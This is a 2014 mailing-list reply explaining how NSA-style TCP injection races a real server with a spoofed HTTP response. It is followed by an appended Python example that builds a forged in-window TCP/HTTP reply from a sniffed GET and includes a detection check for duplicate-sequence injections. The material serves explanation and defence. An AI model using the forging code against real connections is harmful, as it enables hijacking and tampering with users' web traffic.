On Tue, Jan 28, 2014 at 2:08 PM, Hans-Christoph Steiner <h...@at.or.at> wrote:
> I think the MITM attacks that the NSA does on the core internet routers are
> likely based on IP rather than DNS. The reports talk about the system being
> set up to respond before any of the real servers can. So my guess is that they
> are replying to ARPs, thereby claiming an IP. Just a guess...
If you're speaking about quantum insert, the NSA isn't stealing IPs; it doesn't need to, as the network allows pretty much anyone to forge a packet with any non-RFC-1918 IP.

What I understood was that the NSA is able to analyze requests coming from some users in real time and reply with spoofed responses. You can do it in several ways, like hijacking the TCP connection to control the stream end-to-end, but I guess this is too costly. You could get only the packet that contains the GET request (for an HTTP request) and reply faster than the server with another response. You know all the parameters of the TCP/IP connection, so it's easy to hijack a couple of unencrypted packets.

The success rate is not 100% because you need to beat the real server and send your response faster. Doing so will cause the real server to be confused by the ACK the client sends; I'm not sure how the TCP stack will react. It might react differently depending on the OS/kernel too.

See: http://www.spiegel.de/international/world/the-nsa-uses-powerful-toolbox-in-effort-to-spy-on-global-networks-a-940969-3.html

-- 
Jérémie MARGUERIE

Archive: http://lists.debian.org/CAKS89GrGYLnLdsoshPE9McXgdVA-tyQRuOrgpDxYY3�-m...@mail.gmail.com
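The injection the reply above describes, as an added example that is not part of this thread or of any published tool: given only the fields a sniffer sees in the client's GET (addresses, ports, sequence and acknowledgement numbers, payload length), build the forged server-to-client segment with the sequence number the client expects next, an ACK covering the whole request, and valid IP and TCP checksums. The addresses, ports and HTTP payloads are constructed (RFC 5737 ranges); nothing is sent on the wire, since that would need a raw socket and the race against the real server that the reply mentions. The last function shows the flip side of the "confused server" remark: the real server's reply later arrives in the same flow with the same sequence number but different bytes, which is the usual on-the-wire signature of this kind of injection (a genuine retransmission repeats identical bytes).

```python
"""Forging an in-window TCP/HTTP reply from an observed GET (constructed example)."""
import socket
import struct

TCP_PSH_ACK = 0x18  # PSH (0x08) | ACK (0x10)


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, payload: bytes, ttl: int = 64, ident: int = 0) -> bytes:
    """Minimal IPv4 header (no options) carrying a TCP payload, checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0, ttl, 6, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ones_complement_sum(hdr)) + hdr[12:]
    return hdr + payload


def build_tcp(src, dst, sport, dport, seq, ack, flags, payload, window=65535) -> bytes:
    """TCP header (no options); checksum covers the pseudo-header, header and data."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, 20 + len(payload))
    hdr = hdr[:16] + struct.pack("!H", ones_complement_sum(pseudo + hdr + payload)) + hdr[18:]
    return hdr + payload


def forge_response(observed: dict, body: bytes) -> bytes:
    """Build the segment a forger would race the real server with.
    Everything needed is in the client's GET.  The forged segment's seq is the
    client's ack (the next byte the client expects from the server) and its ack
    covers the whole GET, so the client accepts it as a normal in-order reply."""
    http = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
            b"Content-Length: %d\r\nConnection: close\r\n\r\n" % len(body)) + body
    tcp = build_tcp(observed["dst"], observed["src"], observed["dport"], observed["sport"],
                    seq=observed["ack"], ack=observed["seq"] + len(observed["payload"]),
                    flags=TCP_PSH_ACK, payload=http)
    return build_ipv4(observed["dst"], observed["src"], tcp)


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Parse the fields we care about back out of a raw IPv4/TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    total = struct.unpack("!H", pkt[2:4])[0]
    tcp = pkt[ihl:total]
    sport, dport, seq, ack, off, flags, _win, _csum, _urg = struct.unpack("!HHIIBBHHH", tcp[:20])
    return {"src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
            "payload": tcp[(off >> 4) * 4:]}


def checksums_valid(pkt: bytes) -> bool:
    """A header whose checksum field is correct re-checksums to zero."""
    ihl = (pkt[0] & 0x0F) * 4
    total = struct.unpack("!H", pkt[2:4])[0]
    tcp = pkt[ihl:total]
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return ones_complement_sum(pkt[:ihl]) == 0 and ones_complement_sum(pseudo + tcp) == 0


def looks_injected(a: bytes, b: bytes) -> bool:
    """Detection side: two segments of one flow claiming the same sequence
    number but carrying different bytes.  A retransmission repeats the same
    bytes; a forged reply racing the real one does not."""
    pa, pb = parse_ipv4_tcp(a), parse_ipv4_tcp(b)
    same_flow = all(pa[k] == pb[k] for k in ("src", "dst", "sport", "dport"))
    return same_flow and pa["seq"] == pb["seq"] and pa["payload"] != pb["payload"]


# Constructed sample: the client's GET as a sniffer would see it (RFC 5737 addresses).
OBSERVED_GET = {
    "src": "192.0.2.10", "dst": "198.51.100.20", "sport": 51514, "dport": 80,
    "seq": 1000, "ack": 5000,
    "payload": b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
}

if __name__ == "__main__":
    forged = forge_response(OBSERVED_GET, b"<html>injected</html>")
    print(parse_ipv4_tcp(forged), checksums_valid(forged))
```

The forged segment carries no TTL or IP ID consistent with the real server's path, which is why TTL and IP-ID discontinuities within a flow are a second signal that detection rules commonly combine with the duplicate-sequence check above.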